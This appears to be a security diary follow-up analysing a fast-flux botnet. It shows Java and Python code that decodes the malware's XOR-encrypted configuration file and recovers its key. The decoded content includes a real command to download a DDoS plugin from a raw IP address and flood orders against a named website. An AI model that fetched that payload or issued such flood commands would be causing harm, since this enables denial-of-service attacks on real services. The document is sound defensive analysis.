Several of our readers kindly reversed the encrypted configuration file in Appendix D of the paper and provided an explanation. Knowing the contents of the configuration file changes our 5th point of the "Fast-Flux Case Study" considerably. Yes, the malware does download "plugin_ddos.dll", but only because it is ordered to. Depending on the configuration file (which, as you state, is reloaded hourly), the malware can change skin and become anything the owner wants. We would like to thank Ronny Tomaat and Jan Alsenz for their hard work in decoding and analyzing the encrypted configuration file.

All the line contents are XOR'ed with the fixed constant 0xE9. The following short Java snippet decodes the file:

    import java.io.BufferedReader;
    import java.io.FileInputStream;
    import java.io.IOException;
    import java.io.InputStreamReader;

    public class Flux_Decode {
        public static void main(String[] args) throws IOException {
            // ISO-8859-1 maps every byte to exactly one char, so the XOR below
            // works on the raw byte values without any charset conversion damage.
            BufferedReader in = new BufferedReader(new InputStreamReader(
                    new FileInputStream("g:\\fluxnet_setting.ini"), "ISO-8859-1"));
            int key = Integer.decode("#E9");   // the fixed XOR key 0xE9
            while (true) {
                String inStr = in.readLine();
                if (inStr == null) {
                    break;
                }
                char[] inp = inStr.toCharArray();
                for (int i = 0; i < inp.length; i++) {
                    inp[i] = (char) (inp[i] ^ key);   // undo the XOR on each character
                }
                System.out.println(new String(inp));
            }
            in.close();
        }
    }

Just replace the path, or make it a parameter. The decoded content is:

    ==[start decryption]==
    []
    ddos|dl|http://65.111.176.174/weby/plugin_ddos.dll
    ddos|tcp|americandvd.tv|80|10000
    ddos|udp|americandvd.tv|80|10000
    ddos|troll|americandvd.tv|80|10000
    ddos|http|americandvd.tv|80|10000
    ==[end decryption]==
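As an added example (not code from the readers or from the original diary), the Python below reproduces the single-byte XOR decode, parses the decoded lines into structured commands, and shows how the key could have been recovered with a known-plaintext guess even if the constant 0xE9 were not known. The pipe-delimited layout module|action|target[|port|count] is our reading of the five decoded lines above and is an assumption, as is the sample file: it is the decoded content from the post re-encoded with 0xE9 so the script runs offline without the real fluxnet_setting.ini.

```python
"""Decode and parse a Fluxnet-style XOR'ed configuration file.

Added example, not the readers' or the diary's own code. The field layout
module|action|target[|port|count] is inferred from the decoded lines shown in
the post and is an assumption about the bot's parser.
"""
from dataclasses import dataclass
from typing import List, Optional

KEY = 0xE9  # constant single-byte XOR key reported by the readers

# Constructed sample input: the decoded lines from the post, which we re-encode
# below so the example runs offline without the real fluxnet_setting.ini.
PLAINTEXT_LINES = [
    "[]",
    "ddos|dl|http://65.111.176.174/weby/plugin_ddos.dll",
    "ddos|tcp|americandvd.tv|80|10000",
    "ddos|udp|americandvd.tv|80|10000",
    "ddos|troll|americandvd.tv|80|10000",
    "ddos|http|americandvd.tv|80|10000",
]


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same single-byte key (decode == encode)."""
    return bytes(b ^ key for b in data)


def encode_config(lines: List[str], key: int = KEY) -> bytes:
    # Only the line contents are XOR'ed; the newline separators stay as-is,
    # matching what a line-oriented reader like the Java snippet expects.
    return b"\n".join(xor_bytes(line.encode("latin-1"), key) for line in lines) + b"\n"


SAMPLE_CONFIG = encode_config(PLAINTEXT_LINES)


def decode_config(blob: bytes, key: int = KEY) -> List[str]:
    """Return the decoded lines (latin-1 keeps a 1:1 byte-to-char mapping)."""
    return [xor_bytes(line, key).decode("latin-1") for line in blob.split(b"\n") if line]


@dataclass
class Command:
    module: str            # e.g. "ddos"
    action: str            # e.g. "dl", "tcp", "udp", "troll", "http"
    target: str            # URL to fetch, or host to attack
    port: Optional[int] = None
    count: Optional[int] = None


def parse_command(line: str) -> Optional[Command]:
    """Parse one decoded line; returns None for the '[]' header line."""
    if "|" not in line:
        return None
    fields = line.split("|")
    if len(fields) < 3:
        raise ValueError(f"unexpected line: {line!r}")
    module, action, target = fields[:3]
    port = int(fields[3]) if len(fields) > 3 else None
    count = int(fields[4]) if len(fields) > 4 else None
    return Command(module, action, target, port, count)


def parse_config(blob: bytes, key: int = KEY) -> List[Command]:
    return [c for c in (parse_command(l) for l in decode_config(blob, key)) if c]


def recover_key(blob: bytes, known_prefix: bytes = b"ddos|") -> Optional[int]:
    """Known-plaintext attack on a single-byte XOR key.

    A key is accepted only if every decoded line is printable ASCII and at
    least one line starts with known_prefix. Assumption: the file contains a
    line beginning with that prefix (true for the decoded content above).
    """
    lines = [l for l in blob.split(b"\n") if l]
    for key in range(256):
        decoded = [xor_bytes(l, key) for l in lines]
        if not all(0x20 <= b <= 0x7E for d in decoded for b in d):
            continue
        if any(d.startswith(known_prefix) for d in decoded):
            return key
    return None


if __name__ == "__main__":
    print("recovered key: 0x%02X" % recover_key(SAMPLE_CONFIG))
    for cmd in parse_config(SAMPLE_CONFIG):
        print(cmd)
```

The printable-ASCII filter in recover_key is what rules out the 255 wrong keys; for a real sample, widen it (or drop the prefix guess) if the configuration is known to contain non-ASCII bytes.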